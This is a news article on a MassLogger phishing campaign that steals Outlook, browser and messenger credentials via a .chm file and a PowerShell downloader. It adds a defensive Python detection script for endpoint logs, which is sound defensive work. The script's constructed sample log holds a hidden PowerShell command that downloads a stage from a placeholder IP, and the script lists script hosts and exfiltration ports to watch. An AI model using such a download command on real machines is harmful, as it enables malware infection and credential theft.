Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials (Security News, February 2021)
A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps.
Primarily directed against users in Turkey, Latvia, and Italy since mid-January, the attacks use MassLogger, a .NET-based malware with features that hinder static analysis, and build on similar campaigns the same actor ran against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020.
MassLogger was first spotted in the wild in April 2020, but the new variant shows that its authors keep retooling the malware to evade detection and monetize it.
"Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain," researchers with Cisco Talos said on Wednesday.
The phishing attachment is a single compiled HTML (.chm) file that, when opened, displays the message "Customer service" but embeds obfuscated JavaScript. That script builds an HTML page containing a PowerShell downloader, which connects to a legitimate server and fetches the loader that ultimately launches the MassLogger payload.

Aside from exfiltrating the harvested data via SMTP, FTP, or HTTP, the latest version of MassLogger can steal credentials from the Pidgin messenger client, Discord, NordVPN, Outlook, Thunderbird, Firefox, QQ Browser, and Chromium-based browsers such as Chrome, Edge, Opera, and Brave.
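The infection chain and exfiltration channels described above suggest two host-level detections a defender can run over endpoint telemetry: a script host spawned by the Windows HTML Help viewer (the program that opens .chm files), and an SMTP or FTP connection made by a process that is not a mail or FTP client. The following is an added example written for this page, not code from Cisco Talos or from the MassLogger authors. It assumes Sysmon-style field names for process-creation (Event ID 1) and network-connection (Event ID 3) records, that Windows hands .chm files to hh.exe and the PowerShell downloader runs as its child, and every log line in it is constructed rather than captured from a real infection.

```python
"""Detect the CHM -> PowerShell chain and non-mail SMTP/FTP egress.

Added example (not Talos or MassLogger code). Assumptions: Sysmon-style
field names, hh.exe as the .chm handler, and the downloader running as a
child of hh.exe. All events in SAMPLE_LOG are constructed, not real.
"""
import json
from pathlib import PureWindowsPath

# Constructed Sysmon-like events as JSON lines; IPs are RFC 5737 test ranges.
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Windows\\hh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "hh.exe C:\\Users\\alice\\Downloads\\customer_service.chm"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "powershell.exe -WindowStyle Hidden -Command \"(New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')\""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile"}
{"EventID": 3, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "DestinationIp": "198.51.100.5", "DestinationPort": 587}
{"EventID": 3, "Image": "C:\\Users\\alice\\AppData\\Roaming\\svc.exe", "DestinationIp": "192.0.2.20", "DestinationPort": 25}
{"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationIp": "203.0.113.7", "DestinationPort": 443}
{"EventID": 3, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe", "DestinationIp": "192.0.2.30", "DestinationPort": 21}
"""

HELP_VIEWER = "hh.exe"  # Windows HTML Help viewer, the default .chm handler
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Exfiltration ports the article names; HTTP is left out because port 80/443
# traffic is far too common to alert on by port alone.
EXFIL_PORTS = {25: "smtp", 465: "smtps", 587: "submission", 21: "ftp"}
# Processes expected to speak those protocols on a workstation (assumed list).
EXPECTED_SENDERS = {"outlook.exe", "thunderbird.exe", "winscp.exe", "filezilla.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased executable name from a Windows path."""
    return PureWindowsPath(path).name.lower()


def parse_events(log_text: str) -> list[dict]:
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in log_text.strip().splitlines() if line.strip()]


def detect(events: list[dict]) -> list[dict]:
    """Apply both rules and return one finding per matching event, in log order."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            parent = image_name(ev["ParentImage"])
            child = image_name(ev["Image"])
            # Rule 1: a script host launched by the help viewer means the CHM
            # file executed something, which legitimate help content never does.
            if parent == HELP_VIEWER and child in SCRIPT_HOSTS:
                findings.append({"rule": "chm_spawns_script_host",
                                 "image": ev["Image"],
                                 "command_line": ev["CommandLine"]})
        elif ev.get("EventID") == 3:
            proto = EXFIL_PORTS.get(ev["DestinationPort"])
            # Rule 2: SMTP/FTP from anything other than a known mail/FTP client.
            if proto and image_name(ev["Image"]) not in EXPECTED_SENDERS:
                findings.append({"rule": f"unexpected_{proto}_client",
                                 "image": ev["Image"],
                                 "destination": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'})
    return findings


if __name__ == "__main__":
    for finding in detect(parse_events(SAMPLE_LOG)):
        print(finding)
```

Rule 1 is the higher-fidelity signal: hh.exe has no business starting PowerShell, so a single hit is worth an alert. Rule 2 will need tuning per environment (add your own mail-sending agents to EXPECTED_SENDERS) and is best used to corroborate rule 1 or to catch a variant delivered some other way.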
"Masslogger can be configured as a keylogger, but in this case, the actor has disabled this functionality," the researchers noted, adding that the threat actor installed a version of the Masslogger control panel on the exfiltration server.